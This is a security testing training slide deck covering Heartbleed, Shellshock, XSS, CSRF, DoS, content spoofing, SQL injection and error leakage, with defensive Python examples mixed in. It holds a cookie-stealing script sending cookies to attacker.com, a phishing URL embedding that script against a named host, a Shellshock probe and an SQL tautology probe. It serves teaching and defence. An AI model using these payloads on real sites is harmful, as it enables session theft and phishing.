Security_Testing_Presentation

  1. Web Application Vulnerabilities & Security Testing
     ©2012 Trimble Navigation Limited
     18 Jul 2016 ~ Rajil
  2. Objective
     The primary objective is to give a brief introduction to critical and potential vulnerabilities in a web application, together with an overview of the security testing techniques used to detect the underlying vulnerabilities or security holes in a web application.
  3. We do security testing for
     • Confidentiality
     • Privilege escalation
     • Data integrity
  4. Tools Used
     • Nmap
     • Zed Attack Proxy (ZAP)
     • Metasploit
  5. Demo Systems
     • CentOS machine
     • Windows 2008 Server
     • Kali Linux (attacker)
  6. Vulnerabilities covered
     • Heartbleed
     • Shellshock
     • Cross Site Scripting (XSS)
     • Cross Site Request Forgery (CSRF)
     • SQL Injection & Error Messages
     • DoS & Buffer Overflow
     • Content Spoofing
  7. Heartbleed
     Heartbleed is a security bug in the OpenSSL cryptography library, which is widely used to implement the Transport Layer Security (TLS) protocol. The bug is in the TLS heartbeat extension and is caused by improper input validation: the length supplied in the heartbeat message is not checked against the record actually received. The vulnerability is classified as a buffer over-read, a situation where more data can be read than should be allowed. The name is derived from "heartbeat". It was publicly disclosed in April 2014.
  8. Heartbleed
  9. Heartbleed
     • OpenSSL 1.0.1 through 1.0.1f are vulnerable.
     • OpenSSL 1.0.1g was released to address this vulnerability.
     • Lists of vulnerable websites: https://zmap.io/heartbleed/ and http://www.tjkelly.com/blog/heartbleed-website-list/
     • To test online: https://sslanalyzer.comodoca.com/heartbleed.html and https://filippo.io/Heartbleed/
  10. Heartbleed: leaked data from a vulnerable website
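The missing bounds check behind the over-read, as an added Python model rather than OpenSSL's own code (the memory layout, the ADJACENT data and the function names are constructed for illustration): the vulnerable handler copies as many bytes as the peer's length field claims, while the 1.0.1g logic discards any heartbeat whose claimed length does not fit inside the record actually received.

```python
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16                               # RFC 6520: at least 16 bytes of padding follow the payload
ADJACENT = b"session=SECRET-COOKIE; "      # constructed data lying next to the record in memory

def build_memory(claimed_len, payload=b"ping"):
    """Lay out one heartbeat record followed by unrelated data, as a heap buffer might.

    claimed_len is what the peer wrote in the 16-bit length field; the record the
    TLS layer actually delivered holds only len(payload) bytes of payload."""
    record = bytes([HB_REQUEST]) + struct.pack("!H", claimed_len) + payload + b"\x00" * PADDING
    return bytearray(record + ADJACENT), len(record)

def heartbeat_vulnerable(mem, record_len):
    """Pre-1.0.1g logic: trust the peer's length field and copy that many bytes.

    In C the copy walks off the end of the record into whatever follows it;
    Python slicing simply stops at the end of the constructed buffer."""
    payload_len = struct.unpack("!H", mem[1:3])[0]
    payload = bytes(mem[3:3 + payload_len])
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_len) + payload

def heartbeat_fixed(mem, record_len):
    """1.0.1g logic: the claimed length must fit inside the record actually received."""
    if record_len < 1 + 2 + PADDING:
        return None                        # too short to be a well-formed heartbeat
    payload_len = struct.unpack("!H", mem[1:3])[0]
    if 1 + 2 + payload_len + PADDING > record_len:
        return None                        # silently discard, as RFC 6520 requires
    payload = bytes(mem[3:3 + payload_len])
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_len) + payload

if __name__ == "__main__":
    mem, rec_len = build_memory(claimed_len=64)   # length field larger than the record
    print(heartbeat_vulnerable(mem, rec_len))     # echoes the padding plus ADJACENT
    print(heartbeat_fixed(mem, rec_len))          # None: the request is discarded
```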
  11. Shellshock
      Shellshock is also known as Bashdoor; it was disclosed on 24 September 2014. A web server running on a vulnerable Linux or UNIX machine can allow an attacker to execute arbitrary shell commands on the target machine. Windows OS is not vulnerable to this.
  12. Shellshock
  13. Shellshock
      To test whether the system is vulnerable, issue the command below on a Unix or Linux machine:
          env x='() { :;}; echo vulnerable' bash -c 'echo hello'
      A vulnerable Bash prints "vulnerable" before "hello"; a patched Bash prints only "hello".
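The same signature the test command relies on, turned into a detection check over web server logs; this is an added example, not part of the deck, and the log lines are constructed (the probe strings reuse the echo test above):

```python
import re
from urllib.parse import unquote

# CGI hands request headers to scripts as environment variables (HTTP_USER_AGENT,
# HTTP_REFERER, QUERY_STRING ...), which is how a Bash function definition in a
# header reached the vulnerable parser. The signature below is "() {" with
# optional whitespace, the marker every Shellshock probe must carry.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
198.51.100.4 - - [24/Sep/2014:10:01:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Sep/2014:10:02:40 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20probe HTTP/1.1" 500 0 "() { :;}; echo probe" "curl/7.30"
"""

def shellshock_hits(log_text):
    """Return (ip, field) for every header-derived field that carries the signature.

    Values are percent-decoded first, so an encoded probe in the query string
    ("%28%29%20%7B") is matched the same way as a raw one in a header."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # malformed line: skip it, don't abort the scan
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(unquote(m.group(field))):
                hits.append((m.group("ip"), field))
    return hits

if __name__ == "__main__":
    for ip, field in shellshock_hits(SAMPLE_LOG):
        print(f"{ip}: Shellshock signature in {field}")
```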
  14. Cross Site Scripting (XSS)
      This is a hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end user and collect some type of data from the victim. XSS enables attackers to inject client-side script into web pages viewed by other users. XSS allows attackers to execute script in the victim's browser, which can hijack user sessions or redirect the user to malicious sites. XSS leads to session hijacking. There are two types of XSS:
      • Stored XSS
      • Reflected XSS
  15. Cross Site Scripting (XSS)
          <script>alert('hello')</script>
  16. Cross Site Scripting (XSS)
  17. Cross Site Scripting (XSS)
      Cookie stealing:
          <script>document.location='http://attacker.com/tinylogger.php?cookie='.concat(escape(document.cookie));</script>
  18. Cross Site Request Forgery (CSRF)
      A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests; the vulnerable application thinks these requests are legitimate.
  19. Cross Site Request Forgery (CSRF)
      • The attacker sends a malicious link to the victim by some means such as social websites, chat or email. The link may seem very interesting to the victim.
      • Once the victim clicks this link, the browser, without the victim's knowledge, sends forged requests to the server to perform some action.
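The standard defence against the forged request described above, as an added example that is not part of the deck: a per-session synchronizer token that a page from another origin cannot read, plus the cookie attributes that also blunt the cookie-stealing script earlier in the deck. SessionStore, the /transfer form and the handler names are constructed for illustration.

```python
import hmac
import secrets

class SessionStore:
    """Minimal server-side session store (constructed for this example)."""
    def __init__(self):
        self._sessions = {}

    def create(self):
        sid = secrets.token_urlsafe(32)
        # One unpredictable token per session: a forged request from another
        # origin carries the session cookie but cannot know this value.
        self._sessions[sid] = {"csrf_token": secrets.token_urlsafe(32)}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

def session_cookie_header(sid):
    """SameSite=Lax keeps the cookie off cross-site POSTs; HttpOnly keeps it
    out of document.cookie, so the tinylogger script above gets nothing."""
    return f"Set-Cookie: sid={sid}; HttpOnly; Secure; SameSite=Lax"

def render_transfer_form(store, sid):
    """Embed the session's token in the form that the application itself serves."""
    token = store.get(sid)["csrf_token"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')

def handle_transfer(store, cookies, form):
    """Reject any POST whose form token does not match the session's token."""
    session = store.get(cookies.get("sid", ""))
    if session is None:
        return 401, "not logged in"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison on bytes; a missing or guessed token fails here.
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form.get('amount')} to {form.get('to')}"

if __name__ == "__main__":
    store = SessionStore()
    sid = store.create()
    forged = {"to": "mallory", "amount": "1000"}          # what a forged page would post
    print(handle_transfer(store, {"sid": sid}, forged))   # (403, 'CSRF token missing or invalid')
```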
  20. Denial of Service Attacks (DoS or DDoS)
      • This attack is an attempt to make a machine or network resource unavailable to its intended users.
      • One common method of attack involves saturating the target machine with external communication requests, so that it cannot respond to legitimate traffic, or responds so slowly as to be effectively unavailable.
      • This attack consumes all of the target computer's resources so that it can no longer provide its intended service.
      • A distributed denial of service (DDoS) attack is one where the attack comes from more than one, often thousands of, unique IP addresses.
  21. Denial of Service Attacks (DoS or DDoS)
      Types of DoS attacks:
      • ICMP flood
      • SYN flood
      • Ping flood (Ping of Death)
      • Peer-to-peer attacks
      • Application-level floods
  22. Denial of Service Attacks (DoS or DDoS)
      Application-level DoS attack: some DoS attacks rely on software-related exploits such as buffer overflows. These attacks cause the application to fill the disk space or consume all available memory or CPU cycles.
      Buffer overflow: while a program is writing data into a buffer, it overruns the buffer's boundary and overwrites the adjacent memory locations. This may result in erratic program behaviour, including memory access errors, incorrect results, or a crash.
  23. Content Spoofing
      Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user, made possible by an injection vulnerability in a web application. When an application does not properly handle user-supplied data, an attacker can supply content to the web application, typically via a parameter value, that is reflected back to the user. This presents the user with a modified page under the context of the trusted domain. This attack is typically used in conjunction with phishing attacks.
  24. Content Spoofing: sample phishing email
  25. Content Spoofing
      Once the victim clicks one of the malicious links in that email, the vulnerable application displays the spoofed content.
      Payload:
          https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<H1><b>Some malicious activity detected on your acount, kindly <a href="https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<script>document.location='http://attacker.com/tinylogger1.php?cookie='.concat(escape(document.cookie));</script>">Click Here</a> to change the password immediately !!!</b></h1>
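The reflected msg parameter is the root cause shared by the XSS slides and the content spoofing payload above, so one added example covers both (not code from the deck or from the application it shows; the PasswordAlert-style handler, the example.test host and the message codes are constructed): the vulnerable handler reflects msg verbatim, output encoding stops the script, and replacing free text with a server-owned message code stops the spoofing as well.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

PAGE = "<html><body><h1>Password alert</h1><p>{body}</p></body></html>"

def msg_param(url):
    """Pull the msg parameter out of a URL the way the alert page receives it."""
    return parse_qs(urlsplit(url).query).get("msg", [""])[0]

def alert_vulnerable(url):
    """Reflects msg verbatim: markup and script in the parameter become part of the page."""
    return PAGE.format(body=msg_param(url))

def alert_escaped(url):
    """Output-encode the reflected value so the browser treats it as text, not markup."""
    return PAGE.format(body=html.escape(msg_param(url), quote=True))

# The stronger fix for content spoofing: never reflect free text at all.
# The server owns the wording; the URL only selects a message by a short code.
MESSAGES = {
    "expired": "Your password has expired. Please set a new one.",
    "changed": "Your password was changed. Contact support if this was not you.",
}

def alert_by_code(url):
    code = parse_qs(urlsplit(url).query).get("code", [""])[0]
    return PAGE.format(body=MESSAGES.get(code, "No notice is pending for your account."))

# Constructed URLs: a hypothetical host, the deck's probe string, and a spoofed notice.
BASE = "https://example.test/PasswordAlert.jsp?"
PROBE_URL = BASE + urlencode({"msg": "<script>alert('hello')</script>"})
SPOOF_URL = BASE + urlencode({"msg": "<h1>Suspicious activity! <a href='https://attacker.test'>Click here</a></h1>"})

if __name__ == "__main__":
    print(alert_vulnerable(PROBE_URL))          # <script> lands in the page as live markup
    print(alert_escaped(PROBE_URL))             # &lt;script&gt; ... rendered as literal text
    print(alert_by_code(BASE + "code=expired")) # wording chosen by the server, not the URL
```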
  26. SQL Injection
      SQL injection is a technique by which malicious users inject SQL commands into an SQL statement via web page input. The injected SQL commands can alter the SQL statement and compromise the security of a web application.
  27. SQL Injection
  28. SQL Injection
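How injected input alters the statement, and why a parameterised query does not have the problem, as an added example that is not part of the deck (the users table, its rows and the login functions are constructed; SQLite stands in for the database):

```python
import sqlite3

def make_db():
    """In-memory database with constructed rows. Passwords are plain text only to
    keep the example short; a real application stores salted hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db

def login_vulnerable(db, username, password):
    """Builds the statement by concatenation, so input text is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in db.execute(sql)]

def login_parameterised(db, username, password):
    """Placeholders send the values separately from the statement; a quote in the
    input is just a character in the value and never changes the query's shape."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]

# The classic tautology probe from SQL injection testing, supplied as the password.
# Concatenated, the WHERE clause becomes: username = '' AND password = '' OR '1'='1'
PROBE = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "", PROBE))      # ['alice', 'bob']: every row matches
    print(login_parameterised(db, "", PROBE))   # []: no user has that literal password
```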
  29. Error Messages
      Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.
      Error Message 1:
          java.sql.SQLSyntaxErrorException: ORA-00942: Table or View doesn’t exist
              at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:91)
              at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112)
              at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173)
              at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455)
              at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413)
              at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030)
              at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194)
              at oracle.jdbc.driver.T4CPreparedStatement.executeForDescribe(T4CPreparedStatement.java:785)
              at oracle.jdbc.driver.T4CPreparedStatement.executeMaybeDescribe(T4CPreparedStatement.java:860)
              at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:1186)
  30. Error Messages
      Error Message 2:
          java.sql.SQLException: ORA-12899: value too large for column "ROVER"."DRIVER"."DESCRIPTION" (actual: 183, maximum: 80)
              at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:70)
              at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112)
              at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173)
              at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455)
              at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413)
              at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030)
              at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194)
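The fix for both error messages above is to keep the detail in the server log and hand the client only a generic message with a reference id; this added example (not code from the deck) shows that split with a constructed exception standing in for the Oracle driver error, and a MemoryHandler standing in for the real server log.

```python
import logging
import uuid

class MemoryHandler(logging.Handler):
    """Keeps formatted records in a list, standing in for the real server log."""
    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(self.format(record))

server_log = MemoryHandler()
log = logging.getLogger("example.app")
log.addHandler(server_log)
log.setLevel(logging.ERROR)
log.propagate = False

def handle_request(action):
    """Run a request handler; on failure, keep the detail on the server only.

    The full exception and stack trace go to the server log under a random
    reference id; the client receives a generic message and that id, so support
    can find the entry without the driver, schema or code layout being exposed."""
    try:
        return 200, action()
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.error("request failed ref=%s", ref, exc_info=True)
        return 500, f"An internal error occurred. Reference: {ref}"

def failing_query():
    # Constructed stand-in for the driver exception shown on the slide.
    raise RuntimeError("java.sql.SQLSyntaxErrorException: ORA-00942: table or view does not exist")

if __name__ == "__main__":
    print(handle_request(failing_query))           # (500, 'An internal error occurred. Reference: ...')
    print(server_log.records[-1].splitlines()[0])  # request failed ref=... (trace follows in the log)
```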
  31. Thank You
